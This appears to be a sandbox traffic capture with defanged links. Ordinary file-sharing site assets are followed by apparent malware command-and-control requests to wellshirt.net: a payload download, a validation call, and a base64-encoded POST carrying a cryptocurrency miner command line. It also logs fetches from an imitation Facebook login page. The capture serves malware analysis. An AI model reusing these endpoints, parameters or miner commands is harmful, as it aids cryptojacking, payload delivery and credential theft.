/**. * SWFUpload: hXXp://VVV.swfupload.org, hXXp://swfupload.googlecode.com. *. * mmSWFUpload 1.0: Flash upload dialog - hXXp://profandesign.se/swfupload/, hXXp://VVV.vinterwebb.se/. *. * SWFUpload is (c) 2006-2007 Lars Huring, Olov Nilz.n and Mammon Media and is released under the MIT License:. * hXXp://VVV.opensource.org/licenses/mit-license.php. *. * SWFUpload 2 is (c) 2007-2008 Jake Roberts and is released under the MIT License:. * hXXp://VVV.opensource.org/licenses/mit-license.php. *. */.../* ******************* */./* Constructor & Init */./* ******************* */.var SWFUpload;..if (SWFUpload == undefined) {..SWFUpload = function (settings) {...this.initSWFUpload(settings);..};.}..SWFUpload.prototype.initSWFUpload = function (settings) {..try {...this.customSettings = {};.// A container where developers can place their own settings associated with this instance....this.settings = settings;...this.eventQueue = [];...this.movieName = "SWFUpload_" SWFUpload.movieCount ;...this.movieElement = null;.....// Setup global control tracking...SWFUpload.instances[this.movieName] = this;....// Load the settings. Load the Flash movie....this.initSettings();...this.loadFlash();...this.displayDebugInfo();..} catch (ex) {...delete SWFUpload.instances[this.movieName];...throw ex;..}.};../* *************** */./* Static Members */./* *************** */.SWFUpload.instances = {};.SWFUpload.movieCount = 0;.SWFUpload.version = "2.2.0 2009-03-25";.SWFUpload.QUEUE_ERROR = {..QUEUE_LIMIT_EXCEEDED. ..: -100,..FILE_EXCEEDS_
<<
<<< skipped >>>
GET /_images/footer_bg.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 702
Last-Modified: Fri, 14 Sep 2012 15:15:38 GMT
Connection: keep-alive
ETag: "50534a1a-2be"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR...9..........Y.b....tEXtSoftware.Adobe ImageReadyq.e<...`IDATx....r.0.D.l.....U,.....t...=.$.4K......8..v.]...8..G.....|n6..Y~.#.2g.)'s..="..H.....q ...2...J.'....]........P.....\'Z.Ib.....A&:A`.#"..z.......%.n..J....:..`..1...9.7.s........d_...M...4.,.;2.?..J....a...T.|.7bo.p.h[...2....6a.V....8.N.i..<*....`..z.b>.t...H9e~8..gH`F.E..w.dP$F..X|....Q ]2.Gk..,.Vs K.....-9 /..pv.l....,.)L....Q...v.&....c.Q..gg.f3.?(y.T...J....%.O.Va.'...^.V.:...4.....R.>..f...e.u..-4.gK./..pK...ln.j?...w.z...P\.[$.U...-v(...|.(.$.5ony...[.-3..-*..[? ..%.f3..`..~v..}........o..[.....H...:..}k.. .s.[."T...{..&}.i6......[..4{X.I..'{pb.o..f.i.....[<F.-.....Rv......E.s.K.7$&..o..`..-io.0UQ....IEND.B`.....
GET /_images/contact_support.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 2437
Last-Modified: Thu, 13 Sep 2012 22:56:56 GMT
Connection: keep-alive
ETag: "505264b8-985"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR...".........M..]....tEXtSoftware.Adobe ImageReadyq.e<...'IDATx..]{l.U.?...c......F..-.@5<ve..'1f.5.... $...Dw5i..Q..&f.?....D.(b..UYt..E.D..*.-..nw....:3............~c.9.M........;...V4.t..=..k.X;.......tQ.......X..zD.O.=..../ ..Q[4..w.:..].Ajm......[..k..V ..?..uo..S.......`Y.@..F...~.)!.:.Lry...-.Uo.*....Y..._.......eSY.. .....$U...a ...0...@...a ...0...@...a ...0...@....RY.?j.....A:ptX...s.....h.W....$.....=........#.'.....}.......QA..k. .i..-..i......k..|..V/.......g.......|..|.0.n.%.....w..........Q ....q.........4....J.5.'..... ..P.Qg..g(FtZ(....Z>.'??p4\z U).8c.'.5...........Gb.......G.9......#P......I.....pq.......OD..bi...&r..A.grl.d.a...g...eOwZ.H....(@..!}[. . h!x!.....{..>94>P..VW_......l.3.."]SXZ5.#.8..n...z...."......9..@..."...7..w]=]8......~.......S]}..[.N..\J.R...l.UT.u..~.c {.3..r..y...u....).=P.....^.Hdf.....L.*.g._]...?.....w.0.5..*.h.}x0(....Y"@,.mS@....z.5c..............( *K~...4.3V5.....&.3.....d...*G...........4.......n..V,.@.i..(8....Q......=`r......kJ.5.C......... .. ....t.;*mDk..x8w...7jR.B#.e..[....Y..*.a.he.m.%.7V.....J.n...5..WK@..s...d..1..........c_-..T.Iz..n..Q..[zZ...~.(n8cz.8.Mo.........S<..Q...G...O. ........,B9.-......h..!Va5N.^.*.g7....'......%..\..yw.PF\.@...D..f#..8....&e._]u.\.E.....[,...GP.A...-\ ..[.rB...9.*!`.-...".......t8...^.B^....zOJ;.p.!.v>2....d;..f....J.F>YsYF....q.[...`#..&F....6..D.D v h..&h.y.......h..7..w...y.fK{.......%h..h.....>%KOt...7k\c.h..u.4. 3.......|..Jo.IG.Z.{.nb.o.X...k,.....Y(-`.F...J.Z5.../.jE....x2.
<<
<<< skipped >>>
GET /_images/header_refer.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 986
Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT
Connection: keep-alive
ETag: "504e3e8b-3da"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...|IDATx..V]HSa.......t.X...?.5.7rW..#.......e.A....W]t.H.].r... .........h....3.v.N..#...9.b.<....;......A.4.4..s...@...q. .Z..p...r.!..5.x...E......B...g..2.V...1..<...OFGG.UUU-.K.../.9...I$....0J.RR.P.......P..j%..h...-{.@"B..Z.V3;;k...v......d.#..MMM.....\.G.-.H...Ph........m6.k...<t.......|>_...F...c; ... ..).......z...= &.b..G.........c9...@l.q..h..........V...@B...?\.a.g.Yy....d...5.(.tsPs..r}g...!fH.}......E".W*...:.r.\..3".}aL.T.@......F.....A...Y....6q..h........H4 N....L0.D...S,..>0....;w...d.k0.Lxf1<..w..;.sr..]b..x............*...1..r. .^.......A.y...:,...XYY.......V.8. ...].....5..T...!......z.A...I.q...t:.......@._....Gi..V;........444.....=m<..B..0".E[...a...t....nGG......###.1.....?-//o........-..].....{..G..|>...8.i`..a.U...........J...u...m? .g..$tu.$.b...`0hu...333.D$`.d.@...bqjll.*&..}W.,...lF..~.5......!...P. ...H.......pd..c.?.z*.s,.L.8.....= ..I;P.U\q..r.....$a....R.....IEND.B`.....
GET /_images/home/home_gradient_01.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 292
Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT
Connection: keep-alive
ETag: "504e3e8b-124"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR.......%......=.J....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...m..0...y2..9es*..........M1..=..F..h f.o.=&-~?i...(......G.N.B.._^..M<.o`q..L9W...%2......4}......g.u...O......?^.g../z.....o.I.wg&V.\...".p...?*^Y..^/.`..2{.......^......s.4c...w.>z.sa./...v...'4W.....IEND.B`.....
GET /_images/home/home_gradient_02.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 193
Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT
Connection: keep-alive
ETag: "504e3e8b-c1"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR.......T......4......tEXtSoftware.Adobe ImageReadyq.e<...cIDATx.b.Zs.....L...................?.........GfC......a.......P.M.................H......'.......`.zlb..r{.....IEND.B`...
GET /_js/jquery-ui.js HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://VVV.fileswap.com/
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:11 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 90088
Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT
Connection: keep-alive
ETag: "504e3e8c-15fe8"
Expires: Sat, 31 May 2014 15:56:11 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
/*!. * jQuery UI 1.8.16. *. * Copyright 2011, AUTHORS.txt (hXXp://jqueryui.com/about). * Dual licensed under the MIT or GPL Version 2 licenses.. * hXXp://jquery.org/license. *. * hXXp://docs.jquery.com/UI. */.(function(c,j){function k(a,b){var d=a.nodeName.toLowerCase();if("area"===d){b=a.parentNode;d=b.name;if(!a.href||!d||b.nodeName.toLowerCase()!=="map")return false;a=c("img[usemap=#" d "]")[0];return!!a&&l(a)}return(/input|select|textarea|button|object/.test(d)?!a.disabled:"a"==d?a.href||b:b)&&l(a)}function l(a){return!c(a).parents().andSelf().filter(function(){return c.curCSS(this,"visibility")==="hidden"||c.expr.filters.hidden(this)}).length}c.ui=c.ui||{};if(!c.ui.version){c.extend(c.ui,{version:"1.8.16",.keyCode:{ALT:18,BACKSPACE:8,CAPS_LOCK:20,COMMA:188,COMMAND:91,COMMAND_LEFT:91,COMMAND_RIGHT:93,CONTROL:17,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,INSERT:45,LEFT:37,MENU:93,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,NUMPAD_SUBTRACT:109,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SHIFT:16,SPACE:32,TAB:9,UP:38,WINDOWS:91}});c.fn.extend({propAttr:c.fn.prop||c.fn.attr,_focus:c.fn.focus,focus:function(a,b){return typeof a==="number"?this.each(function(){var d=.this;setTimeout(function(){c(d).focus();b&&b.call(d)},a)}):this._focus.apply(this,arguments)},scrollParent:function(){var a;a=c.browser.msie&&/(static|relative)/.test(this.css("position"))||/absolute/.test(this.css("position"))?this.parents().filter(function(){return/(relative|absolute|fixed)/.tes
<<
<<< skipped >>>
GET /_images/ico_24_sharelink.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 1569
Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT
Connection: keep-alive
ETag: "504e3e8b-621"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<...SiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134342, 2010/01/10-18:06:43 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204" xmpMM:DocumentID="xmp.did:0DBC3EDDE30D11E1B1D2E3CE95056E0B" xmpMM:InstanceID="xmp.iid:0DBC3EDCE30D11E1B1D2E3CE95056E0B" xmp:CreatorTool="Adobe Photoshop CS5"> <xmpMM:DerivedFrom stRef:instanceID="uuid:54EEA7D7DECDE111A8DDAB7BBB8AB66E" stRef:documentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......dIDATx..U=.ZA..O.*X.....".XH..%..........2?!.j...J,..VV.*...),D..ET.z....YV........ef..9g....q..x.&.Wn.>....8..v.4...C......*..R.f..a..lv....2.Nb..O\{G.p.q.w..=....d.X.m:...xL...#..z$.._$9..(..X.Vd.^...l6#.....CF.\..=D".`$..8i.`.).;.(.v.._.E............?`.@N$..V^2.<.=.).\...B.x.FJ..z.m*...`L...g..e...3 .S.....$.......M.P.....Z.....F...@..B*.b>...../.v..n._M....t.P.....s...2...T*.z.,d..TE......._MP,...h..@...$...0..`.X..lB$..~..v...N'.Z.......r..j...C...Q.....x<.p...G....h......r.R.M..(.e8.....Q..M....:..p..f"*DD...fS.r9Y!....
<<
<<< skipped >>>
GET /_images/logo/fileswap_large.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 11897
Last-Modified: Tue, 18 Sep 2012 15:38:12 GMT
Connection: keep-alive
ETag: "50589564-2e79"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR.......<.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..}.|....3...=r....%..K...YN..D....V.....P..R[/....Bm..|...UD.P.D.hU.."!$!..f.s..........n8......dg.{~............._M%......P8s..$.......P..3`(C.7......;...'.........B...h:Q.jT......f.,...8Y![..&......n.33.p.......|>..L>yOf.v.I..7..8...j.\..G?..-...~..K..S.N..-.M&..a._Z,.....`....Df..a.@.l...~.[0.R.z....2.l..p&..C$6.2.w..7a.{.......|..3l....P4...w.{.?W^2(.o..D.g1...............8p.........55J..#-..zS..#.P..'V.M\..V...@..q,.gA ]sn1.2.F...m.........h.G.]...|...l........ .TF__.^...f..c.um.!.*)...@7`..0.d..?.=........x.j.z.K.UZ...FRYd .V-_...&w_;..5zU...vo.7:.@... ..[>6'E......).>.T#1b.F.xi.@..Wr_..|.... U)..x.}.......0.........d...a%.....Xe!c........R..:......{.zq.R]6.:C.....`..t:.b....Hggg..,..'B3U.ikk#..<..$....!i.o......U.G >..i....rem1...3.X.@^....{Q).`...a{..... ....~.... v...j.Z..=.......^.<E.....q........Q.]...v.I..0H..h.].d.8...>.)....4.....x...S.X5@;....&..PI.... .....e,].....J.....<Y... ........^...Epy.f..n.Y.j.......'..{:..O{....[.....]r.(.j.).huI.....A..G....#.....f3'....X..q2e.....j.~...Ak...;....5Lj.R.2.B=.f.._.vd..19.u1...s.O&-.{.....G...O.J...GO..v.p\.,?.......~.s.|...Dn...X.j....-.~.!.>. }.....;...`.R.*l:Z......z.p......T......z...O.^.D...^..7d.r.../.*J.A....RWhG-\....}-.%...~....`0(....s|k$*o6......Q..=.m.e....jc.-.0.........&.5.I`.n..=K.|...J..47e!^..Kp....#>&2...<.|..%...%..A...t......f....7.-e.i..~...j0u.1lu..wY..%,Cn.........."S B...UP.kP*...w...[&TY..3*.F.dM..%H...ih...Z...
<<
<<< skipped >>>
GET /_images/home/home_upload_button.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 34227
Last-Modified: Mon, 17 Sep 2012 17:52:51 GMT
Connection: keep-alive
ETag: "50576373-85b3"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR.......x.............tEXtSoftware.Adobe ImageReadyq.e<...UIDATx.....%E.6.T.8yv.....9GvI.d%.(.....(A./.J.U..I..Y........"a.X.e...ff'..............."...W/.......9.9.N.J).x......oB]H.9.....%ob[F...6P..:e..S.<..&.\P.I4.T.&:.....4........6X.M..Tu...!`....h...j...-......a...q&e.$..$...7. I..S..#...IH..[.7CYP........T.....z..>.....0.......A.W..G2... ...|.u..~... ..^...."6.o.z...D"!.?..app..K/..z.3n....* ..D".....q.%..T.`u.j..:nQ.'..7.|eEE....t....g...V,...n.V.!.J......z.....[...p.!..-%fhh...}.so...{......F....f.z.......X?.!.LJ.......I..u..wX..!...W&...9....Z#.&.:.r.....|E.....o~s%....x.S.ByV...O...?.F1....`..l,.:.,."......u......Z....^']p..O.....l>........d.X.|?.b.. ...X.......k,|.'...4...2k...o....H.w...H.......e../...[.I.2J..6..7|.._.^&x..K^...J.5.....ym.m&........1.7.x.%g.R.....lT.....7r.~......_...2..k_...Au`2.P.z&'..:\{..._ ..._...UUUW..`.f7{..l..... ..mI^u.U.uuu.g...===._.....~...qu.p.B[.....ve..z..~O..~C....../....... .p.W.u .~.#{.....$').N[(.....k..?./G...=E..u.#.u8.U.....F.N.P.........TE?... ..p.7.LW}V.....xH....T...~8%`><.&...9..p.....Yn../...WE.E9.!_n..\H." #H.Y..:..Wi..X.E....z.......C...X{f...j..........{.ny.............a....$.....q..=9m..IG.yd.C.v.5....0M..}t.D....{....^.i..u:.#]ju.Tf./D5>"aU....)..:..2..-js.}.....G.q.....C....D..S.r.RN.P..P.!.......C.y.s...E.(>...^................:O.........;.}...[.%y.3..r&...8.Y...6..tAP.....-;...`...e ...3)G.He.,......T..~.H..9....."..%.kt...cF..J*?.B....0..... ...dX...^Q......R..>g$.e...l.-..k....$o.........c.9... Og... ...
<<
<<< skipped >>>
GET /_images/home/home_upload_02.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/jpeg
Content-Length: 25736
Last-Modified: Wed, 12 Sep 2012 22:41:27 GMT
Connection: keep-alive
ETag: "50510f97-6488"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
......Exif..II*.................Ducky.......P.....&Adobe.d.................../...G...d............................................................................................................................................................................................................................................. 0@.!3..P1"2..`#CD.AB$4%5.........................!.01A2...Qaq.."r.3 @.....BR..#.45Pb..s...$..CSc.`..DTU..................... @`!1P.0.."AQa2....................!1AQaq.0@.... ...P..`..p............................................................................................................................................................................................................................................................................................................................<=...................................>O..................................................2.............P...........e@......................(.............J.....'/D......f6.......V...O...........N..............................r@..........J.#.s..~.........xs...8..=5.. .V......`.u.......|..."...z................E%.....L..f4...*............#...|.j....u..7./..|~....)(...x...._.e.F.."...Z..X....Z..G@|..H..kn...6:........@..2.W.....!,......S.x.'fiE..`.3...2.]........`...................z_...W..~.Z....D%......\..|.._...5."..N2.?D..C.....g.........<..2.o.Q.<.........../ ...P..M%...2`...,...}f.W.9..2]zK..%....[..a..>g_.....L.......[......>...v.{....Dj_.-@...!.....~..9.O5Zb...V...t.....z....V.3....
<<
<<< skipped >>>
GET /forum/search.php?method=dep&noxor&file=purple.dep&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: wellshirt.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:55:46 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
..}.bG...C....j.&7 $..._.....!..purple.zip.................................. ;."&{.|....G.qa.s."skS .&s.........w>....)l*...q.h....u..D.....pb..........s........1...nkd..[.c.lP....t.q1.5y..4.Ld.-....U.S/....9aY.@....AX.S.j...........{1>.L...B..ci.\.N.....~.pS.9.K...#._...:.t<....b..*..<....S.W...p........q"..w...L.S ....mC...D...'...h%n_.cA..g...3..Z.R.Z..y.`..8...7P....c..:.........naxV.Vc.f.....F.N.....f^@.!y9...........g....F#Q84k.-=.n.v...M....... !wdW.I....*.\.~7H'?..l.{....ts.Um5=w..8-^}{.6'u.e%(?Cnb.....K.xAbGe.}..:?.G...@.,.~.....*.....`..F.......^.g..m.F @.p..3.q/.#..H....D......|......../..q&...F.....59.C...?.........g'.U]i.`...d..[[Nd..!..8......Tgr.c...A6T..../."......T..B.G!...d.|u..=\1T9.|.l.q./Y$A.P....u...'.....#Ri.A$@..=.M>.U..._.?..2...*.7..q.o.!......*.A...E..S..=_.U..?o........>.M-.m.......xS.....&T......@..C)5.$[..r..>...=2<.".L.1.l..~.y..0....d.z..SAWy.......I.....?@........o...."x...~...%%u..W.n...i._..g.lC../..W:c"s.9. X.....wWi.b....a..&...(.o,..-o...C....z.y.oE!.r.>...*..BZ.(..=..6.ieJl...,8..0.yK.23d..h.Z.I....D.\..!n..T.@v. ).....R.........A....6.n"\....5.............
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b528200 HTTP/1.0
Accept: */*
Connection: close
Host: wellshirt.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:55:36 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Server: YTS/1.20.28
304....S........wellshirt.net.........B..,...Lz.h5#......P;..F2..9!..%Lm...p.D=4a;.{?~a....j....|.7...#..GB..H.9,N.g.].M....f)..M...Q..w..:ps......@x(b......0...Si..0YV..A.K.).x.$..>.2...M.T5..Z...5.MJ8..$.........1....F../UW...h...4.... ..3k..z.}....Kk.{..Dry.... .._Z.H...&....w..d?.q.4.~.....5Fu...{..L..........Y..'qG...O...R.:........>.......G.*..].P0../..x.<..[&~.5... ..e?.C..@...,c....|....z....\P..~:.......M.3.j.....N..OK.J.........]_`..Je^...z..R. ."...2.].@8 ..b@.'........8O.........1W ....>\...A....O(LF..a()N Y.m.Dh..q!h#.K....yd?B.J.....)J..V.BL.P.. .....Y...H.x...$@....u....3;. p..*g;.bS......q\.....j.0.//.vJ.:..=n.)=.~F.eg..S7..".>.....Mg^..'.B... .@..X........."....)..r............'...g.a.b.gK.B/}p..p... d:\.1..bD...>j/.w..8.V1UH..[.C:../Df.4hc............lm..3.$...I......#...B..sP.P".,.2.|. 5...l.....E..A.....`M.7..zt.....1*.._...?X..c\-......Q.s .....J'.........q9....N.......V..-?..:.^.{K=E^/|...p.z.V....\..k. .^...$....B........>..S.xTzQ.`..K....n3..y..h..e..gK...a...j#....W...L..icw.~.!..N,.....2..h..r;F..V....*.%.Ft...i..`E.=......3...?.b....&. .......t8..4.....`~.>..xD.(..iC....w.;.8..t...O.....\D........Y...Ba.b...yp..a.j0.".s..;TG...8..&..Py].VY..Z........;<...Qn......._....\.............e5U..f....2..Ay.s...
<<
<<< skipped >>>
POST /forum/search.php?method=post&type=miner_forced&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: wellshirt.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 265
data=c3Bhd25lZDogJ3dpbjMybXJvY2xpMi5leGUgLWEgY3J5cHRvbmlnaHQgLWEgY3J5cHRvbmlnaHQgLW8gc3RyYXR1bSt0Y3A6Ly9taW5pbi5nczoxNzc3NyAtdSAxVkpydWV4WnpYdVJvczF0V2l4Q3FRNFA3Tlc4VjdxR0NZS3VSYnpYY0p6MmlpeGlTemJ6ODM3U1I0aEpCWlBvUWoxaUp0YmVLVHJlazJiWE50dEY2ZGdBTjZCampieCAtcCB4Jw0K
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:55:47 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Server: YTS/1.20.28
.............
GET /fb_login/index_files/-PAXP-deijE.gif?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://middleevery.net/fb_login/
Accept: */*
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=864000
Expires: Mon, 09 Jun 2014 15:56:13 GMT
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 43
Content-Type: image/gif
Age: 0
Connection: close
Server: YTS/1.20.28
GIF89a......./alok.!.......,...........D..;..
GET /fb_login/index_files/276449379149296_1535348985.png?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://middleevery.net/fb_login/
Accept: */*
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
